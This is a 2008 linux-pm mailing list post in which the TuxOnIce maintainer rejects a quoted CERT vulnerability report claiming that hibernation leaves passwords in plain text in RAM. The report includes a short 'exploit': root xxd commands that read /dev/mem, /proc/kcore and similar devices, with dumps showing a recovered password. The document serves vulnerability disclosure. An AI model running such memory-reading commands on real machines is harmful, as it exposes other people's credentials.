Hi. This is not a bug in TuxOnIce (or for that matter other Linux hibernation implementations, which would have the same issue). TuxOnIce has no way to know what running applications have passwords stored in memory or whether they are storing them in an encrypted format or not. Bugs should be filed against applications that are storing passwords in plain text. By the way, these contact email addresses are grossly out of date. For TuxOnIce, the contact is nigel@xxxxxxxxxxxxx For swsusp and uswsusp (which would have the same problem), refer to linux-pm@xxxxxxxxxxxxxxx Regards, Nigel On Mon, 2008-07-28 at 14:03 +0530, Jonathan Brossard wrote: > > Version 1.0 > October 1996 > CERT(R) Coordination Center > Product Vulnerability Reporting Form > > If you know of a vulnerability in a product, please complete > this form and return it to cert@xxxxxxxxx We aren't able to > acknowledge each report we receive; however, if we have additional > questions, we will contact you for further information. > > We prefer that any vulnerability information you > send to us be encrypted. We can support a shared DES > key or PGP. Contact the CERT staff for more information. > The CERT PGP public key is available in > > http://www.cert.org/pgp/cert_pgp_key.asc > > Thanks, we appreciate your taking the time to report this > vulnerability. > > > > > CONTACT INFORMATION > =============================================================================== > Let us know who you are: > > Name : Jonathan Brossard > E-mail : jonathan@xxxxxxxxxxxxx > Phone / fax : +91-33-23242212 > Affiliation and address: iViZ Technosolutions Pvt. Ltd., Kolkata, > India. http://www.ivizindia.com > > > Have you reported this to the vendor? [yes] > > If so, please let us know whom you've contacted: > > Date of your report : Mon Jul 28 13:57:44 IST 2008 > Vendor contact name : > Vendor contact phone : > Vendor contact e-mail : bernardb@xxxxxxxxxxxxxxxxxxxxx > chabaud@xxxxxxxxxxxxxxxxxxxxx ncunningham@xxxxxxxxxxxxxxxxxxxxx > Vendor reference number : > > > If not, we encourage you to do so--vendors need to hear about > vulnerabilities from you as a customer. > > > POLICY INFO > =============================================================================== > We encourage communication between vendors and their customers. When > we forward a report to the vendor, we include the reporter's name and > contact information unless you let us know otherwise. > > If you want this report to remain anonymous, please check here: > > ___ Do not release my identity to your vendor contact. > > > TECHNICAL INFO > =============================================================================== > If there is a CERT Vulnerability tracking number please put it > here (otherwise leave blank): VU#______. > > > Please describe the vulnerability. > - ---------------------------------- > > The Linux kernel patch "Tux on ice" (previously called "software suspend 2") > fails to sanitize the memory area where user input, > in particular passwords are read. Therefore, the passwords remain in > plain text in RAM, after successfull restauration of the hibernated > machine's > state. > > > What is the impact of this vulnerability? > - ----------------------------------------- > (For example: local user can gain root/privileged access, intruders > can create root-owned files, denial of service attack, etc.) > > a) What is the specific impact: > > Plain text password disclosure of the authentication password. > > b) How would you envision it being used in an attack scenario: > > The attacker can use this password to reboot the computer, possibly > to gain more privileges. > > To your knowledge is the vulnerability currently being exploited? > - ----------------------------------------------------------------- > [no] > > If there is an exploitation script available, please include it here. > - --------------------------------------------------------------------- > > Just pick up one (trivial) exploit below : > > root@blackbox:~# xxd -l 32 -s 0x041e /dev/mem > 000041e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d > 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................ > root@blackbox:~# xxd -l 32 -s 0x41e /dev/oldmem > 000041e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d > 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................ > root@blackbox:~# xxd -l 32 -s 0x041e /dev/.static/dev/mem > 000041e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d > 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................ > root@blackbox:~# xxd -l 32 -s 0x141e /proc/kcore > 000141e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d > 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................ > root@blackbox:~# xxd -l 32 -s 0x141e /dev/core > 000141e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d > 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................ > root@blackbox:~# xxd -l 32 -s 0x141e /dev/.static/dev/core > 000141e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d > 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................ > root@blackbox:~# > > > > Do you know what systems and/or configurations are vulnerable? > - -------------------------------------------------------------- > [yes/no] (If yes, please list them below) > > All versions. > > > Are you aware of any workarounds and/or fixes for this vulnerability? > - --------------------------------------------------------------------- > [yes] > > I provided a kernel patch to the owners of the project. > > OTHER INFORMATION > =========================================================================== > Is there anything else you would like to tell us? > > You can indeed get back to us if you need more details :) > > > - -------- > CERT and CERT Coordination Center are registered in the U.S. Patent and > Trademark office. > _______________________________________________ linux-pm mailing list linux-pm@xxxxxxxxxxxxxxxxxxxxxxxxxx https://lists.linux-foundation.org/mailman/listinfo/linux-pm
